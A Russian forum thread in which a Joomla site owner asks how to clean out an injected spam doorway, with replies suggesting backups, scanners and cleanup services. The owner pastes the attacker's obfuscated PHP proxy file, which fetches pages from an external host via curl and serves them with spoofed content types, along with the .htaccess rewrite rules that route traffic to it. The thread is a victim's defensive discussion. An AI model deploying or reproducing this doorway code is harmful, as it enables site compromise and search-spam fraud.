На сайт залили дор

sheffield157, залили шелл. Где-то дыра в самой джумле. Обратиться к специалисту.

Какие дополнения в Джумле?

Если есть бэкап - восстанавливать. Если нет - разбираться, вычищать. А в robots.txt - запрет на индексацию. Если уже проиндексировано.

В .htaccess - запрет на /load/.

В принципе, тут, скорее не в Джумле, а в стороннем дополнении-модуле. Но, может, и хостинг дыру открыл.

На http://joomlaforum.ru/ надо поискать. Если проблема общая, уже было бы.

Была у меня подобная проблема и именно на джумле, только у меня htacess перезаписывался с вредоносным кодом, видимо я эту гадость скачал сразу с бесплатным шаблоном😂, нашли вот в этом месте sait.ru/plugins/system/loader.php

Не сочтите за рекламу, могу в ЛС дать контакт человека с вебланца который лечил мой сайт. Но если у вас отсутствуют доступы к сайту то наверное будет сложнее.

Главное, чтобы к домену был доступ...

Кстати, если хостер наш и высылали сканы паспортов и пр., доступ восстановят. А у ТСа reg.ru хостер, те любят сканы клянчить. Нас это раздражает, но здесь помочь могут. :)

просканируйте ай-болитом и всё станет понятно.

Признаки однозначные показывающие, что у вас шелл, генерацию самого дора могли впихнуть куда угодно. Если не разбираетесь в специфике удаления и т.д. обращайтесь, проверим сайт все вредоносные коды + дадим рекомендации!

действительно был редирект в htaccess на /components/com_content там в свою очередь был свой htaccess который задавал индексный файл index.php в котором уже вся эта белиберда генерилась.

Теперь еще не понятно был редирект в htaccess на раздел /components/com_content где был шелл, и туда не перекидовало всех подряд (так как меня например не перекидывало) а только определенный контингент я так понимаю? Например мобильный трафик?

Вот это сам индексный файл:

<?php 
$x10="c\x75r\x6c\x5f\x69\x6e\x69t"; $x11="\143url\137\x73e\x74op\x74"; $x12="cu\162\154\137\145x\145\143"; $x13="\143\x75r\x6c\x5f\x63l\157s\145"; $x14="\x68\x65\x61der"; $x15="\160\141\x74\x68\x69\156\x66\x6f"; 
 $x0b = (isset($_GET['id'])) ? $_GET['id'] : ''; $x0c = $x10(); $x0d = "\x68\164\164\x70:/\057x\156--\x39-rt\x62\065c\056\x78\156\055-\160\x31\141i/\063/$x0b"; $x11($x0c, CURLOPT_URL, $x0d); $x11($x0c, CURLOPT_POSTFIELDS, "\x72\145fe\x72\145\x72\075\141n\164\x69\161\x75\145\163\055a\162t.\162\165\057\x6c\157\x61\144"); $x11($x0c, CURLOPT_RETURNTRANSFER, 1); $x0e = $x12($x0c); $x13($x0c); $x0f = $x15($x0b, PATHINFO_EXTENSION); switch ($x0f) {case "j\x70\x67": $x14("\x43\157n\164\x65\156\x74\055\x54\171\160\x65\072 \151m\141\147e\057jp\145\147");case "\x67\151\146": $x14("\x43\157\156\164\145\156\164\055\124y\x70e\072\040i\155a\x67e\x2f\147\x69f");case "p\156g": $x14("\x43on\164ent\x2d\124\x79\x70\145: \x69\155\141\x67\x65\057\160\x6e\x67");case "cs\x73": $x14("\103\157\156\x74e\x6e\164-\x54y\160\x65\x3a te\x78\164/cs\x73\x3b\040\143ha\162\x73\145\x74\x3dutf-8");default: $x14("\x43o\x6et\145\x6e\164-\x54\171\160e: t\145\x78\x74/\x68t\155\154\073\x20c\x68\x61\162s\145t\x3du\x74\x66\0558"); } echo $x0e;?>

Сам htaccess в разделе /components/com_content

RewriteEngine On
RewriteBase /load

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule index.php.* - [L]

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule ^(.*) index.php?id=$1

И еще вот кажется и сам шел нашол но не уверен нашол такой файл в mod_footer которого там недолжно быть.

antiques-art.ru/footer.rar

что еще посоветуете?

Спасибо